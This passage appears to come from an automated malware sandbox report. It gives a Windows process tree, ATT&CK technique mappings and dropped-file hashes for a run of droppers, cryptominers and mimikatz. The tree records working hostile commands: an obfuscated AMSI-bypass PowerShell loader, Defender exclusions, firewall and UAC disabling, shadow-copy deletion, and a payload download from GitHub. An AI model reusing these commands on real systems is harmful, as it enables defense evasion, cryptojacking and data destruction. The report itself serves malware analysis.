      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAAQgAzAEIAMQAuAHQAbQBwAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwAEIAMwBCADEALgB0AG0AcAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABNAGUAcwBzAGEAZwBlAC4AZQB4AGUA
      4⤵
      PID:5880
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 432
        5⤵
        Program crash
        
        PID:6204
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 840
        5⤵
        Program crash
        
        PID:4600
- C:\Users\Admin\AppData\Local\Temp\a\iox.exe
  "C:\Users\Admin\AppData\Local\Temp\a\iox.exe"
  2⤵
  PID:5172
- C:\Users\Admin\AppData\Local\Temp\a\tcp_windows_amd64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tcp_windows_amd64.exe"
  2⤵
  PID:456
- C:\Users\Admin\AppData\Local\Temp\a\js.exe
  "C:\Users\Admin\AppData\Local\Temp\a\js.exe"
  2⤵
  PID:2396
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1y4vl2hk\1y4vl2hk.cmdline"
    3⤵
    PID:1176
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD051.tmp" "c:\Users\Admin\AppData\Local\Temp\1y4vl2hk\CSCC6032C1833E8469E89D13282D475EF0.TMP"
      4⤵
      PID:6372
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2992
- C:\Users\Admin\AppData\Local\Temp\a\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Install.exe"
  2⤵
  PID:6988
- C:\Users\Admin\AppData\Local\Temp\a\Wpmutnro.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Wpmutnro.exe"
  2⤵
  PID:5732
- C:\Users\Admin\AppData\Local\Temp\a\clientside.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clientside.exe"
  2⤵
  PID:4640
- - C:\Windows\svchost.exe
    "C:\Windows\svchost.exe"
    3⤵
    PID:7144
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2164
- C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe"
  2⤵
  PID:5640
- - C:\Windows\WindowsServices.exe
    "C:\Windows\WindowsServices.exe"
    3⤵
    PID:7096
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:336
- C:\Users\Admin\AppData\Local\Temp\a\xmin.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmin.exe"
  2⤵
  PID:5056
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpla"
    3⤵
    - Launches sc.exe
    PID:2072
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpla" binpath= "C:\ProgramData\WinUpla\winuspdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:6220
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5872
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpla"
    3⤵
    - Launches sc.exe
    PID:3772
- C:\Users\Admin\AppData\Local\Temp\a\xmrminer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrminer.exe"
  2⤵
  PID:6212
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:6460
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpdt" binpath= "C:\ProgramData\WinUpdt\wincsupdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:6976
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:6440
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:2472
- C:\Users\Admin\AppData\Local\Temp\a\mindelnew.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mindelnew.exe"
  2⤵
  PID:5776
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    PID:1208
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      PID:5912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    PID:4872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      Kills process with taskkill
      PID:3552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:2548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:6200
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:4696
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:4000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:3988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:6388
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:2228
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:3952
- C:\Users\Admin\AppData\Local\Temp\a\del2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\del2.exe"
  2⤵
  PID:6860
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinSvcs" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
    3⤵
    PID:6640
  - - C:\Windows\system32\sc.exe
      sc delete "WinSvcs"
      4⤵
      Launches sc.exe
      PID:2904
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
      4⤵
      PID:6812
- C:\Users\Admin\AppData\Local\Temp\a\del3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\del3.exe"
  2⤵
  PID:2804
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" ""
    3⤵
    PID:392
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "winsrvcs" & exit
      4⤵
      PID:5392
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "winsrvcs"
        5⤵
        
        PID:7104
- C:\Users\Admin\AppData\Local\Temp\a\minedelll.exe
  "C:\Users\Admin\AppData\Local\Temp\a\minedelll.exe"
  2⤵
  PID:384
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    3⤵
    PID:6596
  - - C:\Windows\system32\sc.exe
      sc delete "WinUpdt"
      4⤵
      Launches sc.exe
      PID:2748
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
      4⤵
      PID:2304
- C:\Users\Admin\AppData\Local\Temp\a\del1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\del1.exe"
  2⤵
  PID:6988
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    3⤵
    PID:2276
  - - C:\Windows\system32\sc.exe
      sc delete "Windows Services"
      4⤵
      Launches sc.exe
      PID:1804
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
      4⤵
      PID:1036
- C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe"
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
    3⤵
    PID:6644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
    3⤵
    PID:1912
- C:\Users\Admin\AppData\Local\Temp\a\Mizedo.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Mizedo.exe"
  2⤵
  PID:6040
- C:\Users\Admin\AppData\Local\Temp\a\Dpose.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Dpose.exe"
  2⤵
  PID:1020
- - \??\c:\Windows\system32\wbem\wmic.exe
    c:\qfdvcS\qfdv\..\..\Windows\qfdv\qfdv\..\..\system32\qfdv\qfdv\..\..\wbem\qfdv\qfdvc\..\..\wmic.exe shadowcopy delete
    3⤵
    PID:2592
- - \??\c:\Windows\system32\wbem\wmic.exe
    c:\fhdTHA\fhdT\..\..\Windows\fhdT\fhdT\..\..\system32\fhdT\fhdT\..\..\wbem\fhdT\fhdTH\..\..\wmic.exe shadowcopy delete
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\a\Dpose.exe"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3604
  - - C:\Windows\SysWOW64\PING.EXE
      ping 1.1.1.1 -n 1 -w 3000
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:6168
- C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
  2⤵
  PID:2352
- C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe"
  2⤵
  PID:6268
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
    3⤵
    PID:4628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4068
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4068" "1928" "1864" "1932" "0" "0" "1936" "0" "0" "0" "0" "0"
        5⤵
        
        PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
    3⤵
    PID:5052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4660
- C:\Users\Admin\AppData\Local\Temp\a\toyour.exe
  "C:\Users\Admin\AppData\Local\Temp\a\toyour.exe"
  2⤵
  PID:5244
- C:\Users\Admin\AppData\Local\Temp\a\klmnr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\klmnr.exe"
  2⤵
  PID:4788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    PID:3804
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      PID:5820
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    PID:1612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      Kills process with taskkill
      PID:6048
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:6512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:7020
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:5764
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:2528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:744
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:5960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:4216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4324 -ip 4324
1⤵
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5640 -ip 5640
1⤵
PID:5732

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iiJqZQFidRAq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dgdoHYsmCkSTQZ,[Parameter(Position=1)][Type]$psOqDODDDn)$svkbwhuZAdw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+'c'+[Char](116)+'ed'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+'m'+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+'e'+[Char](103)+'at'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e','C'+'l'+'as'+[Char](115)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+'C'+'l'+''+[Char](97)+'ss',[MulticastDelegate]);$svkbwhuZAdw.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+[Char](99)+'i'+'a'+'l'+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$dgdoHYsmCkSTQZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$svkbwhuZAdw.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+'e'+'w'+''+'S'+''+[Char](108)+'o'+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$psOqDODDDn,$dgdoHYsmCkSTQZ).SetImplementationFlags('R'+'u'+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'na'+'g'+''+'e'+''+[Char](100)+'');Write-Output $svkbwhuZAdw.CreateType();}$PGrGPpzKUtgzI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+'s'+[Char](111)+''+'f'+''+[Char](116)+'.Win32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+'a'+'feN'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yUvGzgpltYyhlS=$PGrGPpzKUtgzI.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LZSPpnxonjXpodwHDUF=iiJqZQFidRAq @([String])([IntPtr]);$pdKwwTQPbGyQWUdpnfqWHw=iiJqZQFidRAq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bsoXEHWFUiF=$PGrGPpzKUtgzI.GetMethod(''+[Char](71)+''+'e'+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+'d'+'l'+''+'l'+'')));$dhREmkDkhnfbux=$yUvGzgpltYyhlS.Invoke($Null,@([Object]$bsoXEHWFUiF,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$nnrHxedtFkwYZxdRK=$yUvGzgpltYyhlS.Invoke($Null,@([Object]$bsoXEHWFUiF,[Object]('V'+[Char](105)+''+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+'tect')));$HYzmhGR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dhREmkDkhnfbux,$LZSPpnxonjXpodwHDUF).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+'l');$AFpGpgIdURExUrZJA=$yUvGzgpltYyhlS.Invoke($Null,@([Object]$HYzmhGR,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$SpFmRHjBvz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nnrHxedtFkwYZxdRK,$pdKwwTQPbGyQWUdpnfqWHw).Invoke($AFpGpgIdURExUrZJA,[uint32]8,4,[ref]$SpFmRHjBvz);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](82+49),[Byte](90+103),[Byte](90-90),[Byte](4+180),[Byte](174-87),[Byte](180-180),[Byte](245-238),[Byte](72+56),[Byte](166-29),[Byte](229-10),[Byte](89+106),[Byte](99+32),[Byte](46+146),[Byte](150-150)),0,$AFpGpgIdURExUrZJA,250-236);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nnrHxedtFkwYZxdRK,$pdKwwTQPbGyQWUdpnfqWHw).Invoke($AFpGpgIdURExUrZJA,[uint32]8,0x20,[ref]$SpFmRHjBvz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+''+'t'+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1516

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:1540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
1⤵
PID:6676

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx
1⤵
PID:1880
- C:\Windows\SysWOW64\regsvr32.exe
  /s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx
  2⤵
  PID:7108
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6216

C:\ProgramData\WinUpla\winuspdt.exe
C:\ProgramData\WinUpla\winuspdt.exe
1⤵
PID:2124
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1812
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5880 -ip 5880
1⤵
PID:5052

C:\ProgramData\WinUpdt\wincsupdt.exe
C:\ProgramData\WinUpdt\wincsupdt.exe
1⤵
PID:5028
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3536
- C:\Windows\system32\notepad.exe
  notepad.exe
  2⤵
  PID:1428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5880 -ip 5880
1⤵
PID:6704

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:2380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:4636

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:5832
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:5836
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:1720

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6196

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1816

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx
1⤵
PID:1392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PowerShell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a4852fc46a00b2fbd09817fcd179715d

SHA1
